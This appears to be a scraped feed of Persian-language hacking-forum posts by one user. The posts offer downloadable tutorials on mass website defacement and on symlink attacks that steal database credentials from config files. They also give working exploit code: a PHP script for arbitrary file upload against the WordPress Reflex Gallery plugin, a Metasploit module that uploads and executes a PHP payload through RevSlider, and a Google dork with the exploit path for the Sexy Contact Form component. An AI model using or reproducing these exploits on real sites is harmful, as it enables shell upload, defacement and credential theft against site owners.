- هک سایت
- آموزش هک سایت
- (و 5 مورد دیگر)
-
آموزش مس دیفیس
DeMoN پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت دوستان عزیز گارد ایران. خوب دوستان,براتون آموزشی مفید رو آماده کردم که امیدوارم به دردتون بخوره.آموزش کامل مس دیفیس. pass:guardiran.org برای استفاده از آموزش ها ابتدا تمامی پارت ها را دانلود کرده و در یک پوشه اکسترکت نمایید. لینک ابزار پوتی پیشنهاد میکنم دوستانی که اطلاعاتی در این زمینه ندارن ابتدا لینک زیر رو مشاهده کند. لینک آموزش سیملینک زدن برای خواندن فایلهای کنفیگ رو هم قرار دادم. سیملینک یا حق manual mass deface.part1.rar manual mass deface.part2.rar manual mass deface.part3.rar- 1 پاسخ
-
- آموزش دیفیس زدن
- سایت هکینگ
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
آموزش تصویری سیملینک
DeMoN پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت دوستان عزیز گارد ایران. خوب در این درس تصویری شما رو با نحوه ی سیملینک زدن آشنا میکنم. شاید از خودتون بپرسین سیملینک چیست؟ خوب در جواب باید بگم که سیملینک برای خواندن فایلهای کانفیگ و استخراج یوزر و پسورد و نام دیتابیس استفاده میشه که با این یوزر و پس میتونین به دیتا بیس وصل بشین. به دوستان تازه وارد پیشنهاد میکنم که یک نگاهی به لینک زیر بندازید تا با این متد آشنایی بیشتری پیدا کنید. [Hidden Content] Pass:guardiran.org یا حق symlink.part01.rar symlink.part02.rar-
- آموزش سیملینک
- آموزش سرور هکینگ
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
سلام خدمت دوستان عزیز گارد ایران. براتون کتابی آماده کردم در حوضه باگ امنیتی SQL Injection که در این کتاب شما با تمامی مفاهیم،دستورات و نکات باگ SQL آشنا خواهید شد. پیشنهاد میکنم که حتما اینکتاب رو دانلود و مطالعه کنند خصوصا عزیزان تازه وارد. Pass:guardiran.org یاحق SQLInjection.rar
-
- هک سایت با باگ SQL
- سایت هکینگ
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
<?php /* # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:"wp-content/plugins/reflex-gallery/" # Vendor: [Hidden Content] # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC [Hidden Content] # REF COD [Hidden Content] -------------------------------------------------------------------------------- <form method = "POST" action = "" enctype = "multipart/form-data" > <input type = "file" name = "qqfile"><br> <input type = "submit" name = "Submit" value = "Pwn!"> </form > -------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: [Hidden Content] # Twitter: [Hidden Content] # Fanpage: [Hidden Content] # Pastebin [Hidden Content] # GIT: [Hidden Content] # PSS: [Hidden Content] # YOUTUBE [Hidden Content] */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } function __request($params) { $objcurl = curl_init(); curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03"); curl_setopt($objcurl, CURLOPT_POST, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}")); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl) . __plus(); $info['server'] = curl_getinfo($objcurl) . __plus(); curl_close($objcurl) . __plus(); return $info; } echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n"; $params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "[Hidden Content]]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); __request($params) . __plus(); $_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}"; $_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach ($_h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; } $_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!'); WordPress Reflex Gallery 3.1.3 Shell Upload حالشو ببرین یا حق
-
## # This module requires Metasploit: [Hidden Content] # Current source: [Hidden Content] ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', '[Hidden Content]'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end WordPress RevSlider 3.0.95 File Upload / Execute یا حق
-
- هک سایتآموزش هک سایت
- آموزش آپلود فایل
- (و 7 مورد دیگر)
-
سلام خدمت دوستان گارد ایران. همراه شما هستیم با آموز. هک سایت با " cms"sexy contact .فقط شما باید یکخورده خلاقیت به خرج بدین و دورک جدید براش بسارین،این دورکش یکخورده قدیمیه و تعداد تارگت هاش کمه. خوب بریم سراغ آموزش: ابتدا دورک زیر رو در گوگل جست و جوکنید: Powered by sexycontact\" site:gr inurl:/sexy-contact-form سپس به آخر سایت اکسپلویت زیر را اضافه کنید. components/com_sexycontactform/fileupload/index.php به صورت زیر: Www.site.com/components/com_sexycontactform/fileupload/index.php به امید روزی که هیچ سایت sexy در فضای مجازی وجود نداشته باشه. یاحق
-
- site hacking
- هک سایت
-
(و 4 مورد دیگر)
برچسب زده شده با :